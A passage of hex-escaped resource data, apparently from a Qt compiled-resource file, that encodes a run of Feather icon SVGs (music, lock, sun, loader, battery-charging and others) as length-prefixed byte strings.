\x6f\x6f\x74\x68\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x36\x2e\x35\x20\x36\x2e\x35\x20\
\x31\x37\x2e\x35\x20\x31\x37\x2e\x35\x20\x31\x32\x20\x32\x33\x20\
\x31\x32\x20\x31\x20\x31\x37\x2e\x35\x20\x36\x2e\x35\x20\x36\x2e\
\x35\x20\x31\x37\x2e\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x39\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x72\x6e\x65\
\x72\x2d\x72\x69\x67\x68\x74\x2d\x75\x70\x22\x3e\x3c\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x30\
\x20\x39\x20\x31\x35\x20\x34\x20\x32\x30\x20\x39\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\
\x3d\x22\x4d\x34\x20\x32\x30\x68\x37\x61\x34\x20\x34\x20\x30\x20\
\x30\x20\x30\x20\x34\x2d\x34\x56\x34\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x47\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x75\x73\x69\x63\
\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x39\x20\x31\x38\
\x56\x35\x6c\x31\x32\x2d\x32\x76\x31\x33\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x36\
\x22\x20\x63\x79\x3d\x22\x31\x38\x22\x20\x72\x3d\x22\x33\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\x65\
\x20\x63\x78\x3d\x22\x31\x38\x22\x20\x63\x79\x3d\x22\x31\x36\x22\
\x20\x72\x3d\x22\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x66\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x6f\x63\x6b\x65\
\x74\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\x20\x33\
\x68\x31\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\
\x32\x76\x36\x61\x31\x30\x20\x31\x30\x20\x30\x20\x30\x20\x31\x2d\
\x31\x30\x20\x31\x30\x41\x31\x30\x20\x31\x30\x20\x30\x20\x30\x20\
\x31\x20\x32\x20\x31\x31\x56\x35\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x20\x32\x2d\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\
\x3d\x22\x38\x20\x31\x30\x20\x31\x32\x20\x31\x34\x20\x31\x36\x20\
\x31\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x69\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x6f\x6c\x64\x65\
\x72\x2d\x6d\x69\x6e\x75\x73\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\
\x3d\x22\x4d\x32\x32\x20\x31\x39\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x2d\x32\x20\x32\x48\x34\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x2d\x32\x2d\x32\x56\x35\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x20\x32\x2d\x32\x68\x35\x6c\x32\x20\x33\x68\x39\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x32\x7a\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x39\x22\x20\x79\x31\x3d\x22\x31\x34\x22\x20\x78\x32\x3d\x22\x31\
\x35\x22\x20\x79\x32\x3d\x22\x31\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x41\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x6f\x63\x6b\x22\
\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\x20\x79\x3d\x22\
\x31\x31\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\x22\x20\x68\
\x65\x69\x67\x68\x74\x3d\x22\x31\x31\x22\x20\x72\x78\x3d\x22\x32\
\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x37\x20\x31\x31\x56\x37\
\x61\x35\x20\x35\x20\x30\x20\x30\x20\x31\x20\x31\x30\x20\x30\x76\
\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x01\x4b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x72\x65\x6e\x64\
\x69\x6e\x67\x2d\x64\x6f\x77\x6e\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x33\x20\x31\
\x38\x20\x31\x33\x2e\x35\x20\x38\x2e\x35\x20\x38\x2e\x35\x20\x31\
\x33\x2e\x35\x20\x31\x20\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x37\x20\x31\x38\x20\x32\x33\x20\x31\
\x38\x20\x32\x33\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x8a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x75\x6e\x22\x3e\
\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\
\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x35\x22\x3e\x3c\x2f\
\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\x22\
\x31\x32\x22\x20\x79\x32\x3d\x22\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\
\x79\x31\x3d\x22\x32\x31\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\
\x79\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\x2e\x32\x32\x22\x20\x79\
\x31\x3d\x22\x34\x2e\x32\x32\x22\x20\x78\x32\x3d\x22\x35\x2e\x36\
\x34\x22\x20\x79\x32\x3d\x22\x35\x2e\x36\x34\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x38\
\x2e\x33\x36\x22\x20\x79\x31\x3d\x22\x31\x38\x2e\x33\x36\x22\x20\
\x78\x32\x3d\x22\x31\x39\x2e\x37\x38\x22\x20\x79\x32\x3d\x22\x31\
\x39\x2e\x37\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\x22\x31\x32\
\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x32\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\
\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\
\x2e\x32\x32\x22\x20\x79\x31\x3d\x22\x31\x39\x2e\x37\x38\x22\x20\
\x78\x32\x3d\x22\x35\x2e\x36\x34\x22\x20\x79\x32\x3d\x22\x31\x38\
\x2e\x33\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x31\x38\x2e\x33\x36\x22\x20\x79\x31\x3d\
\x22\x35\x2e\x36\x34\x22\x20\x78\x32\x3d\x22\x31\x39\x2e\x37\x38\
\x22\x20\x79\x32\x3d\x22\x34\x2e\x32\x32\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x55\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x6f\x72\x65\x2d\
\x76\x65\x72\x74\x69\x63\x61\x6c\x22\x3e\x3c\x63\x69\x72\x63\x6c\
\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\
\x22\x20\x72\x3d\x22\x31\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\
\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\
\x20\x63\x79\x3d\x22\x35\x22\x20\x72\x3d\x22\x31\x22\x3e\x3c\x2f\
\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\
\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x39\x22\x20\x72\
\x3d\x22\x31\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x02\x66\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x6f\x61\x64\x65\
\x72\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\
\x20\x79\x31\x3d\x22\x32\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\
\x79\x32\x3d\x22\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\
\x31\x38\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\
\x32\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x34\x2e\x39\x33\x22\x20\x79\x31\x3d\x22\x34\
\x2e\x39\x33\x22\x20\x78\x32\x3d\x22\x37\x2e\x37\x36\x22\x20\x79\
\x32\x3d\x22\x37\x2e\x37\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\x2e\x32\x34\x22\
\x20\x79\x31\x3d\x22\x31\x36\x2e\x32\x34\x22\x20\x78\x32\x3d\x22\
\x31\x39\x2e\x30\x37\x22\x20\x79\x32\x3d\x22\x31\x39\x2e\x30\x37\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x32\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\
\x3d\x22\x36\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x38\
\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x32\x32\
\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\x2e\x39\x33\x22\
\x20\x79\x31\x3d\x22\x31\x39\x2e\x30\x37\x22\x20\x78\x32\x3d\x22\
\x37\x2e\x37\x36\x22\x20\x79\x32\x3d\x22\x31\x36\x2e\x32\x34\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x31\x36\x2e\x32\x34\x22\x20\x79\x31\x3d\x22\x37\x2e\x37\
\x36\x22\x20\x78\x32\x3d\x22\x31\x39\x2e\x30\x37\x22\x20\x79\x32\
\x3d\x22\x34\x2e\x39\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xab\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x61\x74\x74\x65\
\x72\x79\x2d\x63\x68\x61\x72\x67\x69\x6e\x67\x22\x3e\x3c\x70\x61\
\x74\x68\x20\x64\x3d\x22\x4d\x35\x20\x31\x38\x48\x33\x61\x32\x20\
\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\x56\x38\x61\x32\x20\
\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\x32\x68\x33\x2e\x31\x39\
\x4d\x31\x35\x20\x36\x68\x32\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x20\x32\x20\x32\x76\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x20\x32\x68\x2d\x33\x2e\x31\x39\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x33\
\x22\x20\x79\x31\x3d\x22\x31\x33\x22\x20\x78\x32\x3d\x22\x32\x33\
\x22\x20\x79\x32\x3d\x22\x31\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\
\x73\x3d\x22\x31\x31\x20\x36\x20\x37\x20\x31\x32\x20\x31\x33\x20\
\x31\x32\x20\x39\x20\x31\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x07\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x6c\x61\x79\x22\
